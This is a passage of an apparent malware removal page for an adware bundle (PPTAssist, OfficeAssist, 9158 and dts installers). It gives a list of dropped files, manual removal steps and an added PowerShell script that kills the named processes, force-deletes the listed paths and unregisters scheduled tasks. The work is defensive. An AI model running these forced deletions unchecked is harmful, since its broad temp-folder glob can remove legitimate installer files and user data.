    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\game1[1].js (4865 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\dot[1].jpg (463 bytes)
    %Documents and Settings%\%current user%\Application Data\dts\Upgrade\app.ini (61 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\18162330BzQOu[1].jpg (2097 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\istat.controller[1].htm (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\sq.clientclass[1].js (1529 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsl40.tmp\System.dll (11 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\MM-liao9906[1].exe (59304 bytes)
    %Program Files%\MM-liao8398.exe (59304 bytes)
    %Program Files%\2.ico (47632 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\OfficeAssist.0419.80.1123[1].exe (225788 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\yx_dts[1].exe (58296 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsl40.tmp\Base64.dll (4 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsl40.tmp\nsProcess.dll (4 bytes)
    %Program Files%\onlines_30863.exe (195990 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\desktop.ini (67 bytes)
    %Program Files%\1.rar (26 bytes)
    %Program Files%\yx_dts.exe (58296 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsl40.tmp\Inetc.dll (20 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\onlines_30863[1].exe (195990 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\desktop.ini (67 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\desktop.ini (67 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsl40.tmp\NSISdl.dll (14 bytes)
    %Program Files%\OfficeAssist.0419.80.1123.exe (225788 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\2[1].ico (47632 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\PPTAssist\cfgs\feature.dat (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\pptassist\~21d476\pptassist.dll (8215 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\PPTAssist\utility\uninst.exe (4185 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\PPTAssist\meihuappt.pps (7385 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\pptassist\~21d476\assistdownloader.exe (1209 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\pptassist\~21d1e5\product.xml (334 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\pptassist\~21d1e5\install_res\103.png (346 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\pptassist\~21d476\updateself.exe (933 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\pptassist\~21d1e5\install_res\30.png (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\pptassist\~21d1e5\install_res\20.png (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\pptassist\~21d476\meihua2007.ppsx (300 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\pptassist\~21d476\desktoptip.exe (4220 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\PPTAssist\assistdownloader.exe (673 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\pptassist\~21d1e5\install_res\101.png (951 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\pptassist\~21d1e5\install_res\cgpb_bg.png (198 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\PPTAssist\cfgs\setup.cfg (643 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\PPTAssist\notify.exe (2321 bytes)
    %Documents and Settings%\%current user%\Start Menu\Programs\PPT美化大师\卸载.lnk (994 bytes)
    %Documents and Settings%\%current user%\Start Menu\Programs\PPT美化大师\PPT美化大师.lnk (910 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\PPTAssist\pptassist64.dll (5873 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\pptassist\~21d1e5\install_res\10.png (6 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\pptassist\~21d476\meihua.exe (1885 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\PPTAssist\meihua2007.ppsx (1425 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\pptassist\~21d476\pptassist64.dll (8201 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\pptassist\~21d476\cfgs\setup.cfg (643 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\PPTAssist\assistupdate.exe (2321 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\pptassist\~21d1e5\install_res\104.png (275 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\PPTAssist\meihua2010.ppsx (1281 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\pptassist\~21d476\cfgs\feature.dat (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\PPTAssist\desktoptip.exe (3361 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\pptassist\~21d476\utility\uninst.exe (5466 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\pptassist\~21d476\meihua2010.ppsx (198 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\pptassist\~21d1e5\install_res\cgpb_fg.png (182 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\pptassist\~21d1e5\install_res\1.png (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\pptassist\~21d1e5\install_res\3.png (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\pptassist\~21d1e5\setup.xml (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\pptassist\~21d476\meihua2003.pps (1810 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\PPTAssist\pptassist.dll (6841 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\pptassist\~21d476\meihuappt.pps (5442 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\pptassist\~21d476\notify.exe (5896 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\pptassist\~21d1e5\install_res\102.png (233 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\pptassist\~21d1e5\install_res\2.jpg (95 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\pptassist\~21d1e5\install_res\100.png (238 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\PPTAssist\meihua2013.ppsx (1281 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\PPTAssist\updateself.exe (1281 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\PPTAssist\meihua2003.pps (3361 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\pptassist\~21d476\assistupdate.exe (4866 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\PPTAssist\meihua.exe (1425 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\pptassist\~21d476\meihua2013.ppsx (199 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsn46.tmp\System.dll (11 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsn46.tmp\FindProcDLL.dll (31 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsn46.tmp\v6svc_oem.dll (5135 bytes)
    %Documents and Settings%\All Users\Application Data\kingsoft\20141220_20542\oem.ini (1263 bytes)
    %Documents and Settings%\All Users\Application Data\kingsoft\20141220_20542\OfficeAssist.0419.80.1123.exe (128768 bytes)

  4. Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
  5. Reboot the computer.
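The removal steps above as one script, added here as an example for this page; it is not Lavasoft's tooling and was not produced by the automated report. Without -Remove it only reports which of the listed indicators are present on the host; with -Remove it stops the processes, deletes the files and unregisters the tasks (and honours -WhatIf). Three things are assumptions rather than facts from the report: that the sandbox's "%Documents and Settings%\%current user%" paths map to the current user's profile folders on the host being cleaned, that the PPTAssistant*_adm.job files correspond to tasks of the same name (the Task Scheduler 1.0 convention), and that the regsvr32.exe instances were registering the dropped pptassist*.dll / v6svc_oem.dll, so only regsvr32 command lines naming those DLLs are treated as malicious.

```powershell
# Triage/removal helper for the indicators in the Removals steps above.
# Added example for this page, not Lavasoft's tooling. Run without -Remove
# first; it then only reports. Add -Remove (optionally with -WhatIf) to act.
# Assumptions (not stated in the report): user-profile path mapping, task
# names taken from the .job file names, and the regsvr32 DLL pattern below.
[CmdletBinding(SupportsShouldProcess = $true)]
param([switch]$Remove)

# [Environment]::GetFolderPath also works on XP, where $env:LOCALAPPDATA is undefined.
$AppData  = [Environment]::GetFolderPath('ApplicationData')
$LocalApp = [Environment]::GetFolderPath('LocalApplicationData')
$Desktop  = [Environment]::GetFolderPath('DesktopDirectory')
$Programs = [Environment]::GetFolderPath('Programs')
$AllUsers = [Environment]::GetFolderPath('CommonApplicationData')

# Step 1: image names from the report. The PIDs there belong to the sandbox
# run and mean nothing on another machine, so processes are matched by name.
# regsvr32.exe is a system binary and is matched by command line instead.
$ProcessNames = 'yx_dts', 'notify', '9158chat2_ktv083_98', 'assistupdate',
                'dts', 'OfficeAssist.0419.80.1123', '9158'
$DllPattern   = 'pptassist|v6svc_oem'          # assumption, see header

# Step 3: dropped files. A directory is listed where the report shows many
# files under one dropped-software root.
$Paths = @(
    (Join-Path $AppData  'dts'),
    (Join-Path $AppData  'pptassist'),
    (Join-Path $AppData  'Microsoft\Internet Explorer\Quick Launch\大天使之剑.lnk'),
    (Join-Path $LocalApp 'PPTAssist'),
    (Join-Path $env:TEMP 'pptassist'),
    (Join-Path $Desktop  '大天使之剑.lnk'),
    (Join-Path $Desktop  '9158多人视频.lnk'),
    (Join-Path $Programs '大天使之剑'),
    (Join-Path $Programs '9158多人视频'),
    (Join-Path $Programs 'PPT美化大师'),
    (Join-Path $AllUsers 'kingsoft\20141220_20542'),
    (Join-Path $env:ProgramFiles '9158ktv'),
    'C:\temp.icon',
    'C:\1419052427l238l63518.exe&_upt=6ec6a9a21419053027'
)
foreach ($n in 'MM-liao8398.exe', 'onlines_30863.exe', 'yx_dts.exe',
               'OfficeAssist.0419.80.1123.exe', '1.rar', '2.ico') {
    $Paths += Join-Path $env:ProgramFiles $n
}
# NSIS extraction dirs (nsw44.tmp, nss49.tmp, ...). Legitimate NSIS installers
# use the same naming, so review this group before running with -Remove.
$TempGlob = Join-Path $env:TEMP 'ns?[0-9][0-9].tmp'
$Tasks    = 'PPTAssistantNotifyTask_adm', 'PPTAssistantUpdateTask_adm'

# --- processes first, so the files below are no longer locked ---
$procs = @(Get-Process -Name $ProcessNames -ErrorAction SilentlyContinue)
# Win32_Process exposes the command line, which Get-Process on XP does not.
$procs += @(Get-WmiObject Win32_Process -Filter "Name='regsvr32.exe'" |
            Where-Object { $_.CommandLine -match $DllPattern } |
            ForEach-Object { Get-Process -Id $_.ProcessId -ErrorAction SilentlyContinue })
foreach ($p in $procs) {
    Write-Output ('process  {0,-30} pid {1}' -f $p.ProcessName, $p.Id)
    if ($Remove -and $PSCmdlet.ShouldProcess("$($p.ProcessName) pid $($p.Id)", 'Stop-Process')) {
        Stop-Process -Id $p.Id -Force
    }
}

# --- files and directories ---
$items = @($Paths | Where-Object { Test-Path -LiteralPath $_ })
$items += @(Get-ChildItem -Path $TempGlob -ErrorAction SilentlyContinue |
            ForEach-Object { $_.FullName })
foreach ($item in $items) {
    Write-Output "file     $item"
    if ($Remove -and $PSCmdlet.ShouldProcess($item, 'Remove-Item')) {
        Remove-Item -LiteralPath $item -Recurse -Force
    }
}

# --- scheduled tasks: unregister through the scheduler, not just the .job file ---
foreach ($task in $Tasks) {
    $job = Join-Path $env:windir "Tasks\$task.job"
    if (Test-Path -LiteralPath $job) {
        Write-Output "task     $task ($job)"
        if ($Remove -and $PSCmdlet.ShouldProcess($task, 'schtasks /Delete')) {
            schtasks.exe /Delete /TN $task /F | Out-Null
        }
    }
}
# Steps 2, 4 and 5 stay manual: the dropper's own file name varies, the IE cache
# can be cleared with "RunDll32.exe InetCpl.cpl,ClearMyTracksByProcess 8" (IE7
# or later), and a reboot shows whether anything re-spawns.
```

Save the script as UTF-8 with a byte-order mark, otherwise PowerShell 2.0 misreads the Chinese shortcut names, and run it from an elevated prompt. The order matters: processes are stopped before files are touched, and the tasks are removed through schtasks so the scheduler does not keep a stale entry pointing at a deleted executable.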

*Manual removal may cause unexpected system behaviour and should be performed at your own risk.
